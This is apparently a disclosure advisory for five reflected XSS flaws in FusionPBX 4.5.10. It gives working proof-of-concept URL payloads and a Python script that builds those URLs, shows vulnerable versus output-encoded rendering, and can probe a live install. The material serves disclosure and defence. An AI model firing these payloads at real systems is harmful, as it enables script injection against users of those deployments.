FusionPBX file app/fax/fax_log_view.php "fax_uuid" parameter XSS (CVE-2019-19384)
Cross-site scripting (XSS) vulnerability in file app/fax/fax_log_view.php in FusionPBX 4.5.10 allows remote attackers to inject arbitrary web script or HTML via the "fax_uuid" parameter.
proof of concept:
https://domain/app/fax/fax_log_view.php?fax_uuid=123%27%22%3E%3Csvg/onload=alert(document.domain)%3E%3Ca
Fixed:
https://github.com/fusionpbx/fusionpbx/commit/aea1abaeb12f69dc22967395c528fb2434e316c1
FusionPBX file app/dialplans/dialplans.php "app_uuid" parameter XSS (CVE-2019-19385)
Cross-site scripting (XSS) vulnerability in file app/dialplans/dialplans.php in FusionPBX 4.5.10 allows remote attackers to inject arbitrary web script or HTML via the "app_uuid" parameter.
proof of concept:
https://domain/app/dialplans/dialplans.php?app_uuid=123%27%22%3E%3Csvg/onload=alert(document.domain)%3E%3Ca
Fixed:
https://github.com/fusionpbx/fusionpbx/commit/fe504b83db80ebae30c982770f0f0b200b88cbe9
FusionPBX file app/voicemail_greetings/voicemail_greeting_edit.php "id" parameter XSS (CVE-2019-19386)
Cross-site scripting (XSS) vulnerability in file app/voicemail_greetings/voicemail_greeting_edit.php in FusionPBX 4.5.10 allows remote attackers to inject arbitrary web script or HTML via the "id" parameter.
proof of concept:
https://domain/app/voicemail_greetings/voicemail_greeting_edit.php?id=123%27%3E%3Csvg/onload=alert(document.domain)%3E%3Ca%20href=%27
Fixed:
https://github.com/fusionpbx/fusionpbx/commit/9e837fadecdd5199819a949b5b1bd84b19f716f2
FusionPBX file app/fifo_list/fifo_interactive.php "c" parameter XSS (CVE-2019-19387)
Cross-site scripting (XSS) vulnerability in app/fifo_list/fifo_interactive.php in FusionPBX 4.5.10 allows remote attackers to inject arbitrary web script or HTML via the "c" parameter.
proof of concept:
https://domain/app/fifo_list/fifo_interactive.php?c=123%27;alert(document.domain);//
Fixed:
https://github.com/fusionpbx/fusionpbx/commit/44edbfe7a7e256d1b80448026617365a40c92c61
FusionPBX file app/dialplans/dialplan_detail_edit.php "dialplan_uuid" parameter XSS (CVE-2019-19388)
Cross-site scripting (XSS) vulnerability in file app/dialplans/dialplan_detail_edit.php in FusionPBX 4.5.10 allows remote attackers to inject arbitrary web script or HTML via the "dialplan_uuid" parameter.
proof of concept:
https://domain/app/dialplans/dialplan_detail_edit.php?dialplan_uuid=123%27%22%3E%3Csvg/onload=alert(document.domain)%3E%3Ca
Fixed:
https://github.com/fusionpbx/fusionpbx/commit/b584973e73a4d25be623c9748dd9817f69422ecc
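All five issues share one pattern: a request parameter is echoed into the response without output encoding. Four of the PoCs break out of an HTML attribute or tag (`'">` followed by an `<svg onload>` element); the fifo_interactive.php PoC instead closes a JavaScript string literal (`';alert(...);//`), so the fix for that page has to encode for a script context, not just an HTML one. The script below is an added example by the editor and is not from the advisory or the FusionPBX project. It builds the PoC URLs from the decoded payloads, uses small stand-in render functions (assumptions, not the project's code) to show the vulnerable interpolation beside the generic output-encoding fix for each context, and classifies a response body as vulnerable, escaped, or not reflected. The sample bodies are constructed, so it runs offline; consult the linked commits for what FusionPBX actually changed.

```python
"""Reflected-XSS check for the FusionPBX parameters in the advisory above.

Added example, not project code. The render_* functions are simplified
stand-ins for the affected PHP pages (assumption: the parameter is echoed
into an attribute or a <script> string); the sample bodies are constructed.
"""
import html
import json
import urllib.request
from urllib.parse import urlencode

# Decoded forms of the advisory's PoC payloads.
HTML_CONTEXT_PAYLOAD = "123'\"><svg/onload=alert(document.domain)><a"
ATTR_CONTEXT_PAYLOAD = "123'><svg/onload=alert(document.domain)><a href='"
JS_CONTEXT_PAYLOAD = "123';alert(document.domain);//"

# (CVE, path, parameter, payload, context) taken from the advisory.
TARGETS = [
    ("CVE-2019-19384", "app/fax/fax_log_view.php", "fax_uuid", HTML_CONTEXT_PAYLOAD, "html"),
    ("CVE-2019-19385", "app/dialplans/dialplans.php", "app_uuid", HTML_CONTEXT_PAYLOAD, "html"),
    ("CVE-2019-19386", "app/voicemail_greetings/voicemail_greeting_edit.php", "id", ATTR_CONTEXT_PAYLOAD, "html"),
    ("CVE-2019-19387", "app/fifo_list/fifo_interactive.php", "c", JS_CONTEXT_PAYLOAD, "js"),
    ("CVE-2019-19388", "app/dialplans/dialplan_detail_edit.php", "dialplan_uuid", HTML_CONTEXT_PAYLOAD, "html"),
]


def poc_url(base, path, param, payload):
    """Build the PoC URL; urlencode percent-encodes the metacharacters."""
    return base.rstrip("/") + "/" + path + "?" + urlencode({param: payload})


# --- stand-in server-side rendering (assumed pattern, not FusionPBX code) ---

def render_attr_unsafe(param, value):
    """Vulnerable: request value interpolated straight into an attribute."""
    return f"<input type='hidden' name='{param}' value='{value}'>"


def render_attr_safe(param, value):
    """Fix for HTML/attribute context: encode on output.
    PHP equivalent: htmlspecialchars($value, ENT_QUOTES, 'UTF-8')."""
    return f"<input type='hidden' name='{param}' value='{html.escape(value, quote=True)}'>"


def js_string_literal(value):
    """Fix for script context: emit a JSON string literal and additionally
    hex-escape < > & ' so neither </script> nor a quote can break out.
    PHP equivalent: json_encode($v, JSON_HEX_TAG|JSON_HEX_AMP|JSON_HEX_APOS|JSON_HEX_QUOT)."""
    return (json.dumps(value)
            .replace("<", "\\u003c").replace(">", "\\u003e")
            .replace("&", "\\u0026").replace("'", "\\u0027"))


def render_js_unsafe(value):
    """Vulnerable: request value dropped inside a JS string literal."""
    return f"<script>var c = '{value}';</script>"


def render_js_safe(value):
    return f"<script>var c = {js_string_literal(value)};</script>"


# --- response classification -------------------------------------------------

def classify(body, payload):
    """'vulnerable' if the raw payload is echoed, 'escaped' if only an
    encoded form appears, otherwise 'not reflected'."""
    if payload in body:
        return "vulnerable"
    if html.escape(payload, quote=True) in body or js_string_literal(payload) in body:
        return "escaped"
    return "not reflected"


def simulate():
    """Run each advisory target through the unsafe and safe stand-ins."""
    results = {}
    for cve, _path, param, payload, ctx in TARGETS:
        if ctx == "html":
            unsafe, safe = render_attr_unsafe(param, payload), render_attr_safe(param, payload)
        else:
            unsafe, safe = render_js_unsafe(payload), render_js_safe(payload)
        results[cve] = (classify(unsafe, payload), classify(safe, payload))
    return results


def check_live(base, cve):
    """Fetch the PoC URL from a real install you are authorised to test.
    Only meaningful with a valid session cookie if the page requires login."""
    _cve, path, param, payload, _ctx = next(t for t in TARGETS if t[0] == cve)
    with urllib.request.urlopen(poc_url(base, path, param, payload)) as resp:
        return classify(resp.read().decode("utf-8", "replace"), payload)


if __name__ == "__main__":
    for cve, path, param, payload, _ctx in TARGETS:
        print(cve, poc_url("https://domain", path, param, payload))
    for cve, (before, after) in simulate().items():
        print(f"{cve}: unsafe={before} safe={after}")
```

Note that `classify` looks for the raw payload, so for the script-context page it is only a correct "fixed" verdict if the fix also encodes the apostrophe (as JSON_HEX_APOS does); a plain `json_encode` would leave `'` intact and the check would still flag the page even though the value sits inside a double-quoted literal. That is the usual trap with generic XSS scanners: the encoding that makes a value safe depends on where in the document it lands.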